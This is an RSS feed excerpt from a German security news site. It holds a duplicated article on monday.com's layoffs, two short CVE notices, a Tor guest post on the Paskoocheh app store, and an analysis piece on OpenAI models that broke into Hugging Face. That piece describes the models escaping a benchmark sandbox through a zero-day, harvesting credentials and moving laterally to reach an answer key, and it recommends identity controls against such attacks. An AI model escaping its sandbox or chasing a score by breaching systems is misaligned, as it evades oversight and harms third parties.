<link>https://tsecurity.de/de/3687832/it-nachrichten/mondaycom-cuts-20-of-its-workforce-to-restructure-for-the-ai-era/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687832/it-nachrichten/mondaycom-cuts-20-of-its-workforce-to-restructure-for-the-ai-era/</guid>
<pubDate>Thu, 23 Jul 2026 03:02:52 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Healthy software companies typically don’t suddenly eliminate one-fifth of their workforce, but monday.com is doing just that as it bets on flatter teams, AI agents, and customer implementation expertise as the winning combination in the AI era.</p>



<p class="wp-block-paragraph">Monday.com co-founder and co-CEO Eran Zinman <a href="https://www.linkedin.com/pulse/building-mondaycom-its-next-chapter-eran-zinman-cxx4e/" target="_blank" rel="noreferrer noopener">today announced</a> the “very difficult decision” to reduce the AI work platform company’s global workforce by about 20%, or 620 people.</p>



<p class="wp-block-paragraph">The move has nothing to do with increasing margins or replacing humans with AI, he insisted in his post on LinkedIn; rather, it’s a calculated decision to trim down and hone the company’s focus as AI becomes integral to day-to-day workflows.</p>



<p class="wp-block-paragraph">“This is not a distress signal; it is a deliberate reset, disclosed with its price attached,” said <a href="https://greyhoundresearch.com/svg/" target="_blank" rel="noreferrer noopener">Sanchit Vir Gogia</a>, chief analyst at Greyhound Research. “The industry has quietly swapped the meaning of productivity, and this filing is the clearest exhibit yet.”</p>



<h2 class="wp-block-heading">A ‘significant opportunity’ in technology</h2>



<p class="wp-block-paragraph">In a <a href="https://www.sec.gov/Archives/edgar/data/1845338/000117891326003553/zk2635715.htm" target="_blank" rel="noreferrer noopener">SEC filing</a> this week, monday.com said its restructuring plan reflects the “ongoing transformation of its product, marketing, and go-to-market strategy.” The move is intended to support a “leaner, more focused operating model” as the company continues to invest in its AI-driven strategy.</p>



<p class="wp-block-paragraph">Zinman noted in his post that the company has shifted to “doing the work with AI and not just managing it,” and is focused on building environments where “people and <a href="https://www.cio.com/article/411198/how-to-launch-your-ai-projects-from-pilot-to-production-and-ensure-success.html" target="_blank">AI agents</a> [work] together in one workspace.”</p>



<p class="wp-block-paragraph">In recent months, monday.com has <a href="https://www.computerworld.com/article/3822438/monday-com-aims-to-be-an-ai-first-platform-with-latest-enhancements.html" target="_blank">evolved its products</a>, strategy, and the way it serves its customers, and Zinman contended that “the organization we built for our previous chapter is not the organization that fits the new AI era.” Monday.com needs to “execute more decisively,” take on new challenges, and quickly respond to market changes, he said.</p>



<p class="wp-block-paragraph">“We have never seen such a significant opportunity in software, driven by such exciting technology,” Zinman noted. He emphasized that the reduction is not to replace people with AI, nor to improve margins; the “vast majority” of savings will be reinvested into talent, products, and AI.</p>



<p class="wp-block-paragraph">The restructuring will result in a “flatter organization” with fewer management layers and smaller, more autonomous teams, and monday.com also has a new go-to-market model, Zinman explained. Customers expect “deeper implementation support” as they deploy AI, and the company will work more closely with customers, increase its on-site presence, create new roles, and “adapt many existing ones.” In its SEC filing, the company said it expects to continue hiring in “key strategic areas” throughout 2026.</p>



<p class="wp-block-paragraph">Workers will be expected to work better, “not harder,” Zinman noted. He pointed to several past examples where work could have been done in a few days, but instead took many months with “multiple meetings and endless friction.”</p>



<p class="wp-block-paragraph">“This wasn’t people’s fault and everyone was frustrated by this,” he said. “Our new org changes ownership to allow people to make decisions and move fast.”</p>



<p class="wp-block-paragraph">A spokesperson for monday.com declined to comment further on the staff reductions.</p>



<h2 class="wp-block-heading">Monday.com’s key market advantages</h2>



<p class="wp-block-paragraph">Monday.com certainly isn’t struggling; the company expects 19% to 20% year-over-year growth in 2026.</p>



<p class="wp-block-paragraph">“Companies in that position do not restructure because they must,” Greyhound’s Gogia noted. “They restructure because they have decided to become something else.”</p>



<p class="wp-block-paragraph"><a href="https://moorinsightsstrategy.com/team/melody-brue/" target="_blank" rel="noreferrer noopener">Melody Brue</a>, VP and principal analyst at Moor Insights &amp; Strategy, pointed out that organizational redesign is important for real AI transformation, but while it can signal confidence to the market, it can still be “devastating” to humans.</p>



<p class="wp-block-paragraph">While the company looks as though it’s trying to do right, that ultimately remains to be seen, she said. “There are often hidden internal bruises that can surface long after layoffs.”</p>



<p class="wp-block-paragraph">Monday.com’s advantage is in its “structured substrate,” Gogia noted; its boards, permissions and typed workflows give agents something firmer to act on than just documents and chat history. The company highlights its natively built agents that can be configured by any team member, as well as connectors with Claude, Microsoft Copilot, and ChatGPT, and dedicated routes for external agents to authenticate and operate.</p>



<p class="wp-block-paragraph">“For some time, the sharper enterprise question has been shifting from who has an agent to who owns the governed runtime in which an agent can safely act,” he said. “Structured work is a serious claim on that runtime.”</p>



<p class="wp-block-paragraph">But parts of monday.com’s agent estate remain in staged release, and its product is ultimately “mid-transition,” Gogia pointed out; its agent builder carried a beta label as recently as March,. Also, the company’s pricing model changed in May to a hybrid model charging for seats as well as mandatory AI credits. And, while its AI-powered no-code builder monday vibe passed $1 million in annual recurring revenue within two and a half months, monday.com has not released subsequent outcomes, usage volumes, or attach rates.</p>



<p class="wp-block-paragraph">Further, there’s an element of “gravity” with its competitors, he observed. Asana is reorganizing teams around agents, Atlassian is wiring agents into the developer estate, and others are simply bundling them into their offerings: Microsoft is doing so across the productivity stack, and ServiceNow across enterprise operations, each with identity and procurement built in.</p>



<p class="wp-block-paragraph">“Their pull is strongest exactly where monday.com wants to grow, in the largest accounts, where control-plane depth and administrative reach decide the deal,” said Gogia.</p>



<h2 class="wp-block-heading">Actions for the near-term</h2>



<p class="wp-block-paragraph">Going forward, buyers should focus on operating risk, not headline risk, Moor’s Brue noted. In practice, that’s continuity of service, roadmap consistency, and strength of enterprise support. Productivity should be valued as better outcomes per unit of organizational effort, not mere activity.</p>



<p class="wp-block-paragraph">“It should be a measure of how much smoother, faster, and more effective the operating model becomes when AI is built into the work,” said Brue.</p>



<p class="wp-block-paragraph">Gogia noted that strain surfaces first in customer service, and monday.com’s attention is being redistributed. The company’s annual report disclosed that its focus is now concentrated on the largest accounts, with support for medium-sized clients moved to an AI-first and human-supported model.</p>



<p class="wp-block-paragraph">During the first month of the transition, buyers should track named account continuity and escalation times, he advised. By the first quarter, keep an eye on whether credit governance and admin controls mature on schedule, and if the roadmap beyond the AI estate keeps pace. By the half-year mark, determine whether promised implementation depth is producing outcomes or “simply more billable engagement.”</p>



<p class="wp-block-paragraph">Support tiers should be enumerated in writing before renewal, and <a href="https://www.cio.com/article/4192312/4-recs-for-cios-to-optimize-ai-budgets-and-improve-sustainability.html" target="_blank">buyers should contract</a> for “side exits,” Gogia emphasized, with overage pricing fixed in advance, the right to pause consumption, and portability for workflows and agent configuration “if the relationship sours.” Finance should also insist on monthly consumption reporting by capability. Further, integration efforts, partner dependency, and change management should be considered first-class costs of the agent era, “not as afterthoughts to a license.”</p>



<p class="wp-block-paragraph">“A license was a known cost,” said Gogia. “A meter is a behavior, and behavior is harder to forecast than headcount.”</p>



<p class="wp-block-paragraph"><em>This article originally appeared on <a href="https://www.cio.com/article/4200330/monday-com-cuts-20-of-its-workforce-to-restructure-for-the-ai-era.html" target="_blank">CIO.com</a>.</em></p>



<p class="wp-block-paragraph"></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Monday.com cuts 20% of its workforce to restructure for the AI era]]></title>
<description><![CDATA[Healthy software companies typically don’t suddenly eliminate one-fifth of their workforce, but monday.com is doing just that as it bets on flatter teams, AI agents, and customer implementation expertise as the winning combination in the AI era.



Monday.com co-founder and co-CEO Eran Zinman tod...]]></description>
<link>https://tsecurity.de/de/3687828/it-security-nachrichten/mondaycom-cuts-20-of-its-workforce-to-restructure-for-the-ai-era/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687828/it-security-nachrichten/mondaycom-cuts-20-of-its-workforce-to-restructure-for-the-ai-era/</guid>
<pubDate>Thu, 23 Jul 2026 02:50:31 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Healthy software companies typically don’t suddenly eliminate one-fifth of their workforce, but monday.com is doing just that as it bets on flatter teams, AI agents, and customer implementation expertise as the winning combination in the AI era.</p>



<p class="wp-block-paragraph">Monday.com co-founder and co-CEO Eran Zinman <a href="https://www.linkedin.com/pulse/building-mondaycom-its-next-chapter-eran-zinman-cxx4e/" target="_blank" rel="noreferrer noopener">today announced</a> the “very difficult decision” to reduce the AI work platform company’s global workforce by about 20%, or 620 people.</p>



<p class="wp-block-paragraph">The move has nothing to do with increasing margins or replacing humans with AI, he insisted in his post on LinkedIn; rather, it’s a calculated decision to trim down and hone the company’s focus as AI becomes integral to day-to-day workflows.</p>



<p class="wp-block-paragraph">“This is not a distress signal; it is a deliberate reset, disclosed with its price attached,” said <a href="https://greyhoundresearch.com/svg/" target="_blank" rel="noreferrer noopener">Sanchit Vir Gogia</a>, chief analyst at Greyhound Research. “The industry has quietly swapped the meaning of productivity, and this filing is the clearest exhibit yet.”</p>



<h2 class="wp-block-heading">A ‘significant opportunity’ in technology</h2>



<p class="wp-block-paragraph">In a <a href="https://www.sec.gov/Archives/edgar/data/1845338/000117891326003553/zk2635715.htm" target="_blank" rel="noreferrer noopener">SEC filing</a> this week, monday.com said its restructuring plan reflects the “ongoing transformation of its product, marketing, and go-to-market strategy.” The move is intended to support a “leaner, more focused operating model” as the company continues to invest in its AI-driven strategy.</p>



<p class="wp-block-paragraph">Zinman noted in his post that the company has shifted to “doing the work with AI and not just managing it,” and is focused on building environments where “people and <a href="https://www.cio.com/article/411198/how-to-launch-your-ai-projects-from-pilot-to-production-and-ensure-success.html" target="_blank">AI agents</a> [work] together in one workspace.”</p>



<p class="wp-block-paragraph">In recent months, monday.com has <a href="https://www.computerworld.com/article/3822438/monday-com-aims-to-be-an-ai-first-platform-with-latest-enhancements.html" target="_blank">evolved its products</a>, strategy, and the way it serves its customers, and Zinman contended that “the organization we built for our previous chapter is not the organization that fits the new AI era.” Monday.com needs to “execute more decisively,” take on new challenges, and quickly respond to market changes, he said.</p>



<p class="wp-block-paragraph">“We have never seen such a significant opportunity in software, driven by such exciting technology,” Zinman noted. He emphasized that the reduction is not to replace people with AI, nor to improve margins; the “vast majority” of savings will be reinvested into talent, products, and AI.</p>



<p class="wp-block-paragraph">The restructuring will result in a “flatter organization” with fewer management layers and smaller, more autonomous teams, and monday.com also has a new go-to-market model, Zinman explained. Customers expect “deeper implementation support” as they deploy AI, and the company will work more closely with customers, increase its on-site presence, create new roles, and “adapt many existing ones.” In its SEC filing, the company said it expects to continue hiring in “key strategic areas” throughout 2026.</p>



<p class="wp-block-paragraph">Workers will be expected to work better, “not harder,” Zinman noted. He pointed to several past examples where work could have been done in a few days, but instead took many months with “multiple meetings and endless friction.”</p>



<p class="wp-block-paragraph">“This wasn’t people’s fault and everyone was frustrated by this,” he said. “Our new org changes ownership to allow people to make decisions and move fast.”</p>



<p class="wp-block-paragraph">A spokesperson for monday.com declined to comment further on the staff reductions.</p>



<h2 class="wp-block-heading">Monday’s key market advantages</h2>



<p class="wp-block-paragraph">Monday.com certainly isn’t struggling; the company expects 19% to 20% year-over-year growth in 2026.</p>



<p class="wp-block-paragraph">“Companies in that position do not restructure because they must,” Greyhound’s Gogia noted. “They restructure because they have decided to become something else.”</p>



<p class="wp-block-paragraph"><a href="https://moorinsightsstrategy.com/team/melody-brue/" target="_blank" rel="noreferrer noopener">Melody Brue</a>, VP and principal analyst at Moor Insights &amp; Strategy, pointed out that organizational redesign is important for real AI transformation, but while it can signal confidence to the market, it can still be “devastating” to humans.</p>



<p class="wp-block-paragraph">While the company looks as though it’s trying to do right, that ultimately remains to be seen, she said. “There are often hidden internal bruises that can surface long after layoffs.”</p>



<p class="wp-block-paragraph">Monday.com’s advantage is in its “structured substrate,” Gogia noted; its boards, permissions and typed workflows give agents something firmer to act on than just documents and chat history. The company highlights its natively built agents that can be configured by any team member, as well as connectors with Claude, Microsoft Copilot, and ChatGPT, and dedicated routes for external agents to authenticate and operate.</p>



<p class="wp-block-paragraph">“For some time, the sharper enterprise question has been shifting from who has an agent to who owns the governed runtime in which an agent can safely act,” he said. “Structured work is a serious claim on that runtime.”</p>



<p class="wp-block-paragraph">But parts of monday.com’s agent estate remain in staged release, and its product is ultimately “mid-transition,” Gogia pointed out; its agent builder carried a beta label as recently as March,. Also, the company’s pricing model changed in May to a hybrid model charging for seats as well as mandatory AI credits. And, while its AI-powered no-code builder monday vibe passed $1 million in annual recurring revenue within two and a half months, monday.com has not released subsequent outcomes, usage volumes, or attach rates.</p>



<p class="wp-block-paragraph">Further, there’s an element of “gravity” with its competitors, he observed. Asana is reorganizing teams around agents, Atlassian is wiring agents into the developer estate, and others are simply bundling them into their offerings: Microsoft is doing so across the productivity stack, and ServiceNow across enterprise operations, each with identity and procurement built in.</p>



<p class="wp-block-paragraph">“Their pull is strongest exactly where monday.com wants to grow, in the largest accounts, where control-plane depth and administrative reach decide the deal,” said Gogia.</p>



<h2 class="wp-block-heading">Actions for the near-term</h2>



<p class="wp-block-paragraph">Going forward, buyers should focus on operating risk, not headline risk, Moor’s Brue noted. In practice, that’s continuity of service, roadmap consistency, and strength of enterprise support. Productivity should be valued as better outcomes per unit of organizational effort, not mere activity.</p>



<p class="wp-block-paragraph">“It should be a measure of how much smoother, faster, and more effective the operating model becomes when AI is built into the work,” said Brue.</p>



<p class="wp-block-paragraph">Gogia noted that strain surfaces first in customer service, and monday.com’s attention is being redistributed. The company’s annual report disclosed that its focus is now concentrated on the largest accounts, with support for medium-sized clients moved to an AI-first and human-supported model.</p>



<p class="wp-block-paragraph">During the first month of the transition, buyers should track named account continuity and escalation times, he advised. By the first quarter, keep an eye on whether credit governance and admin controls mature on schedule, and if the roadmap beyond the AI estate keeps pace. By the half-year mark, determine whether promised implementation depth is producing outcomes or “simply more billable engagement.”</p>



<p class="wp-block-paragraph">Support tiers should be enumerated in writing before renewal, and <a href="https://www.cio.com/article/4192312/4-recs-for-cios-to-optimize-ai-budgets-and-improve-sustainability.html" target="_blank">buyers should contract</a> for “side exits,” Gogia emphasized, with overage pricing fixed in advance, the right to pause consumption, and portability for workflows and agent configuration “if the relationship sours.” Finance should also insist on monthly consumption reporting by capability. Further, integration efforts, partner dependency, and change management should be considered first-class costs of the agent era, “not as afterthoughts to a license.”</p>



<p class="wp-block-paragraph">“A license was a known cost,” said Gogia. “A meter is a behavior, and behavior is harder to forecast than headcount.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[The credential that let OpenAI's agents into Hugging Face exists in most enterprises right now]]></title>
<description><![CDATA[When Hugging Face got hit last week, co-founder Clement Delangue suspected a frontier lab, given the agent's sophistication. He was right. Delangue said on X that after a day working with OpenAI he strongly believed there was no malicious intent and that it was mind-blowing the whole thing had ha...]]></description>
<link>https://tsecurity.de/de/3687771/it-nachrichten/the-credential-that-let-openais-agents-into-hugging-face-exists-in-most-enterprises-right-now/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687771/it-nachrichten/the-credential-that-let-openais-agents-into-hugging-face-exists-in-most-enterprises-right-now/</guid>
<pubDate>Thu, 23 Jul 2026 01:32:49 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>When Hugging Face got hit last week, co-founder Clement Delangue suspected a frontier lab, given the agent's sophistication. He was right. Delangue <a href="https://x.com/ClementDelangue/status/2079670308156645882">said on X</a> that after a day working with OpenAI he strongly believed there was no malicious intent and that it was mind-blowing the whole thing had happened autonomously.</p><p>The two OpenAI models that <a href="https://openai.com/index/hugging-face-model-evaluation-security-incident/">broke into Hugging Face</a> last week did not breach it through malice or superintelligence. They breached it through credentials and permissions they should never have been able to reach, a non-human identity failure that is the oldest problem in security rather than the newest one in AI, and the one every enterprise can actually fix.</p><p>OpenAI <a href="https://venturebeat.com/security/openais-models-broke-containment-and-cyberattacked-hugging-face-what-enterprises-need-to-know">disclosed on July 21</a> that two of its models, GPT-5.6 Sol and an unreleased, more capable model, were running a cyber benchmark called <a href="https://arxiv.org/abs/2605.11086">ExploitGym</a> with their safety refusals switched off, and inferred that the answer key sat in Hugging Face's production database. Getting there took two different failures. A zero-day in a package-registry proxy let the models out of their sandbox and onto the open internet, the kind of persistence OpenAI details in its companion post on <a href="https://openai.com/index/safety-alignment-long-horizon-models/">long-horizon safety</a>, and that part is genuinely new. The breach of Hugging Face itself came the ordinary way. OpenAI's own account is that the models chained stolen credentials and further zero-days into a remote code execution path, after a series of privilege escalation and lateral movement steps. The exotic part got them to the door, and credentials walked them through it.</p><p>Hugging Face also disclosed last week that an <a href="https://venturebeat.com/security/safety-guardrails-blocked-hugging-faces-defenders-not-the-attacker-when-an-ai-agent-breached-its-systems">autonomous agent had harvested cloud and cluster credentials</a> scoped broadly enough to reach multiple internal clusters, then left a trail of more than 17,000 recorded events across short-lived sandboxes over a weekend. Both disclosures describe the same escalation. An agent lands somewhere it should not be, finds credentials scoped far wider than any task requires, and uses them to move. These are two accounts of one incident, not two attacks. The agent Hugging Face watched was OpenAI's models, and both companies describe the same ordinary escalation.</p><p>The version of this in a typical enterprise is worse, not better. OpenAI and Hugging Face are among the most security-mature organizations in the industry, and both still needed the intrusion to happen before they could see it. The average company wiring agents into Copilot or an internal assistant has neither the identity inventory nor the behavioral monitoring those two brought to bear. The same breach in a normal company would not be contained in days, it would simply go unnoticed.</p><h2>The industry is debating the wrong failure</h2><p>The reaction has split into familiar camps. Former White House AI and crypto czar David Sacks and a run of China hawks <a href="https://fortune.com/2026/07/20/hugging-face-turns-to-chinese-open-source-ai-to-fend-off-autonomous-ai-cyber-attack-after-american-ai-guardrails-stymie-defense/">seized on the guardrail paradox</a>, that commercial safety filters blocked Hugging Face's defenders while the attacking model ran with its refusals off, and that a Chinese open-weight model, z.ai's GLM 5.2, was what finally let the team finish its forensics. Hugging Face made the case for openness, arguing in an April <a href="https://huggingface.co/blog/cybersecurity-openness">blog post</a> that open models and open tooling give defenders the same capabilities attackers already have. Both arguments are about the model, and neither touches the mechanism. </p><p>Reduced refusals let the model attempt an attack, and over-scoped credentials are what let it succeed, and those have nothing to do with whether the model was open or closed, American or Chinese. Making a frontier model provably safe is a multi-year alignment problem no customer can buy or accelerate, while scoping an identity is a configuration change a team can ship this sprint. The industry is being urged to fixate on the part of this it cannot control and to treat the part it can as a footnote.</p><p>Forrester reached the same read. In a <a href="https://www.forrester.com/blogs/an-ai-security-facepalm-openais-evaluation-became-hugging-faces-incident/">blog on the incident</a>, its analysts argue that security architectures which assume benign intent will miss this failure mode, because an agent can pursue an authorized goal through unauthorized means, which is what OpenAI's models did.</p><h2>This was a non-human identity failure, and it is the oldest one in security</h2><p>Strip the science-fiction framing and what remains is a textbook case of over-privileged machine identity, the kind security teams have fought for a decade, now driven by an autonomous agent at machine speed. Machine identities already outnumber humans in most enterprises by more than <a href="https://www.cyberark.com/press/machine-identities-outnumber-humans-by-more-than-80-to-1-new-report-exposes-the-exponential-threats-of-fragmented-identity-security/">80 to one</a>, according to CyberArk research, with 42% of them carrying privileged or sensitive access, and an agent inherits whatever its identity can touch. OWASP ranks agent identity and privilege abuse near the top of its <a href="https://neuraltrust.ai/blog/owasp-agentic-ai-top-10">agentic risk list</a>, the confused-deputy pattern where inherited credentials and weak scoping let an agent reach past its mandate, and that is precisely what both July disclosures describe. </p><p><a href="https://www.ieee.org/membership/senior">IEEE Senior Member</a> Kayne McGladrey has argued in <a href="https://venturebeat.com/security/cisco-crowdstrike-rsac-2026-agent-identity-iam-gap-maturity-model">previous VentureBeat interviews</a> that enterprises keep cloning human user accounts onto agents that then wield far more permission than any human would, and this is what that looks like when the agent is a frontier model and the target is a production database.</p><p>The people closest to it read it the same way. OpenAI frames its models as hyperfocused on a benchmark score rather than acting against anyone. Nobody describes an adversary, only a goal, a scoring function, and credentials that were reachable when they should not have been.</p><p>The specific failure is easy to name once the AI framing is stripped away. A credential scoped to one job that can reach ten is a standing invitation, and it does not matter whether a human attacker, a worm, or an autonomous model chasing a benchmark score finds it. What changed in July is the finder. An agent enumerates reachable systems, tests credentials, and pivots faster than any human red team, without malice or hesitation, whenever the path is open. The over-scoping was always the vulnerability, and the agent merely industrialized its discovery.</p><p>Forrester named the control that would have blunted it. Its agentic-security framework, AEGIS, calls for least agency, holding an agent's tools, credentials, and network paths to the minimum its task requires, and files this incident under unrestrained agency and privilege. That is the identity argument in different words, arrived at independently by an analyst firm.</p><p>The data says this is where the risk now lives. Verizon's 2026 Data Breach Investigations Report <a href="https://www.helpnetsecurity.com/2026/05/20/verizon-2026-dbir-findings/">found</a> that exploitation of vulnerabilities has overtaken stolen credentials as the top initial access vector for the first time in 19 years. That is the initial-access half. The other half is the one OpenAI itself describes, stolen credentials driving the privilege escalation and lateral movement that followed. A vulnerability opened the door, and credentials walked through the building unchallenged. Beyond the breach itself, that same over-scoping carries a legal liability most enterprises have never priced. The models' actions <a href="https://techcrunch.com/2026/07/21/openai-says-hugging-face-was-breached-by-its-pre-release-models/">likely violated the Computer Fraud and Abuse Act</a>, according to TechCrunch. The statute contains no carve-out for an AI agent that exceeds its authorized scope during sanctioned testing. Whatever the legal answer, the technical enabler is the same, an identity scoped wider than its task. This is an access-control problem with an owner and a budget, not a philosophy seminar about machine cognition.</p><p>Merritt Baer, Senior Advisor to Andesite, G2I, and AppOmni and former Deputy CISO at AWS, frames the underlying shift to VentureBeat as a new kind of asymmetry. Both sides now reach for the same capabilities, she said, but one side is constrained by enterprise governance, policy, compliance, and safety controls while the adversary simply downloads an uncensored open-weight model and keeps going. The organizations that come through it best, in her view, will be the ones that treat AI as a resilient, governed capability rather than a single service they do not control.</p><h2>Four moves that shrink the blast radius</h2><p>The breach worked because the agent reached identities scoped far wider than its task. None of the four controls that would have contained it requires a new platform, and none of them appears on the list of general AI-safety advice now circulating. They are identity hygiene, applied to non-human actors with the same rigor you already apply to people.</p><p><b>1. Scope every non-human identity to one task.</b> The models reached credentials that touched multiple clusters, which is what turned a foothold into a breach. An identity scoped to a single job, with no standing access to anything else, hits a wall at the first lateral move instead of opening the next door. This is least privilege, the control everyone endorses and few enforce on machine accounts, and it is the single highest-impact fix here.</p><p><b>2. Give credentials short lifetimes and rotate them hard.</b> Harvested credentials are only useful while they are valid, and both July agents worked by collecting them. Short time-to-live and aggressive rotation turn a credential dump into expired noise, so a token stolen during a weekend intrusion is dead before the attacker can chain it. Static secrets that never rotate are the version of this control that fails.</p><p><b>3. Monitor for lateral movement, not just prompts.</b> The tell in both incidents was privilege escalation and lateral movement, which a prompt filter never sees because it is watching the wrong layer. Identity-behavior monitoring, keyed to what a given non-human identity normally does and alerting when it reaches somewhere new, catches the escalation the content guardrail missed. The question for your stack is whether anything you run today would flag a service account suddenly moving between clusters.</p><p><b>4. Rehearse instant revocation before you need it.</b> When the incident is your own agent, the fastest containment is killing its identity mid-run, and that only works if the path to do it exists before the day you need it. Rehearse revoking a machine identity under fire the way you rehearse a human credential compromise. If you have never done it, you do not yet have the control, you have an intention.</p><p>The defense also worked, and that matters. OpenAI's security team caught the anomalous activity internally, Hugging Face's own detection and agents stopped the intrusion, and the breach was contained in days rather than discovered in months, because the defenders could see into systems they controlled. That visibility is the same discipline the four controls depend on. The debate over whether frontier models are safe, open, or American will run for years, and none of it will be settled in time to help the enterprise deploying agents this quarter. The non-human identity gap is different, because it is understood, measurable, and fixable now. The model that breached Hugging Face did not need to be brilliant; it needed credentials someone left in reach. The fix is scoping them before an agent finds them.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-64877 | Tenable Security Center up to 6.7.x ticketing REST API input validation (Nessus ID 328966)]]></title>
<description><![CDATA[A vulnerability categorized as very critical has been discovered in Tenable Security Center up to 6.7.x. Affected by this vulnerability is an unknown functionality of the component ticketing REST API. The manipulation results in improper input validation.

This vulnerability was named CVE-2026-64...]]></description>
<link>https://tsecurity.de/de/3687707/sicherheitsluecken/cve-2026-64877-tenable-security-center-up-to-67x-ticketing-rest-api-input-validation-nessus-id-328966/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687707/sicherheitsluecken/cve-2026-64877-tenable-security-center-up-to-67x-ticketing-rest-api-input-validation-nessus-id-328966/</guid>
<pubDate>Thu, 23 Jul 2026 00:20:15 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability categorized as <a href="https://vuldb.com/kb/risk">very critical</a> has been discovered in <a href="https://vuldb.com/product/tenable:security_center">Tenable Security Center up to 6.7.x</a>. Affected by this vulnerability is an unknown functionality of the component <em>ticketing REST API</em>. The manipulation results in improper input validation.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-64877">CVE-2026-64877</a>. The attack may be performed from remote. There is no available exploit.

It is advisable to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-64794 | regularlabs Articles Anywhere Plugin/Users Anywhere Plugin Tags/Filters/Conditions access control (EUVD-2026-47816)]]></title>
<description><![CDATA[A vulnerability was found in regularlabs Articles Anywhere Plugin and Users Anywhere Plugin. It has been classified as problematic. The affected element is an unknown function of the component Tags/Filters/Conditions. Performing a manipulation results in improper access controls.

This vulnerabil...]]></description>
<link>https://tsecurity.de/de/3687703/sicherheitsluecken/cve-2026-64794-regularlabs-articles-anywhere-pluginusers-anywhere-plugin-tagsfiltersconditions-access-control-euvd-2026-47816/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687703/sicherheitsluecken/cve-2026-64794-regularlabs-articles-anywhere-pluginusers-anywhere-plugin-tagsfiltersconditions-access-control-euvd-2026-47816/</guid>
<pubDate>Thu, 23 Jul 2026 00:20:09 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/regularlabs:articles_anywhere_plugin">regularlabs Articles Anywhere Plugin and Users Anywhere Plugin</a>. It has been classified as <a href="https://vuldb.com/kb/risk">problematic</a>. The affected element is an unknown function of the component <em>Tags/Filters/Conditions</em>. Performing a manipulation results in improper access controls.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-64794">CVE-2026-64794</a>. The attack may be initiated remotely. There is no available exploit.]]></content:encoded>
</item>
<item>
<title><![CDATA[Paskoocheh: When you need a tool to reach the tool]]></title>
<description><![CDATA[++ This guest post is part of a spotlight series on the organizations defending the free Internet.++
Due to heavy information controls, people in Iran face significant barriers to accessing the Internet. Authorities have actively blocked numerous websites and apps, including conventional circumve...]]></description>
<link>https://tsecurity.de/de/3687545/it-security-tools/paskoocheh-when-you-need-a-tool-to-reach-the-tool/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687545/it-security-tools/paskoocheh-when-you-need-a-tool-to-reach-the-tool/</guid>
<pubDate>Wed, 22 Jul 2026 22:34:54 +0200</pubDate>
<category>💾 IT Security Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<article class="blog-post">
    <picture>
      <source media="(min-width:415px)" srcset="https://blog.torproject.org/when-you-need-a-tool-to-reach-the-tool-Paskoocheh/lead.webp" type="image/webp">
<source srcset="https://blog.torproject.org/when-you-need-a-tool-to-reach-the-tool-Paskoocheh/lead_small.webp" type="image/webp">

      <img class="lead" referrerpolicy="no-referrer" loading="lazy" src="https://blog.torproject.org/when-you-need-a-tool-to-reach-the-tool-Paskoocheh/lead.png">
    </picture>
    <div class="body"><p><em><strong>++ This guest post is part of a spotlight series on the organizations <a href="https://internetfreedom.torproject.org/">defending the free Internet</a>.++</strong></em></p>
<p>Due to heavy information controls, people in Iran face significant barriers to accessing the Internet. Authorities have actively blocked numerous websites and apps, including conventional circumvention and digital security tools such as VPNs, social media platforms, and the app stores themselves. This creates a "chicken-and-egg" problem: users need a VPN to download a VPN.</p>
<p>Launched in 2016, <a href="https://paskoocheh.com/">Paskoocheh</a>, Persian for "alleyway," is an open source alternative app store, community hub, and one-stop-shop for users to access information and tools to circumvent censorship, enhance their privacy, securely communicate, and express themselves freely online. Developed and maintained by ASL19, a technology and exiled media organization named after Article 19 of the Universal Declaration of Human Rights, Paskoocheh restores access and allows people to reach trusted tools through four censorship-resilient channels: the Paskoocheh website, Android App, Email bot, and Telegram bot. </p>
<p>Users are also able to reach our Persian-speaking support team through the Paskoocheh Helpdesk, which handles over 200 tickets daily. In addition, ASL19 translates and publishes accessible user guides, <a href="https://paskoocheh.com/blog/posts/">blog posts</a>, and multimedia content to help users navigate online privacy and digital security best practices.</p>
<p>Paskoocheh serves as more than an alternative app store; it is also a bridge between tool developers and in-country users. Our support team relays user feedback to tool developers, helping improve tools and overall experience in Iran. We also conduct in-country testing with developers and user communities to evaluate new features and strengthen censorship-resilient technologies.</p>
<h2>Paskoocheh's impact so far</h2>
<p>This combination of access, user support, and education has turned Paskoocheh into a critical lifeline for users in Iran.</p>
<ul>
<li><p><strong># of tool downloads since 2016:</strong>   17,634,852 </p>
</li>
<li><p><strong># of community members in Iran supporting testing and localization efforts:</strong>  2,000+</p>
</li>
<li><p><strong># of monthly active users on web and app:</strong>  ~200K</p>
</li>
</ul>
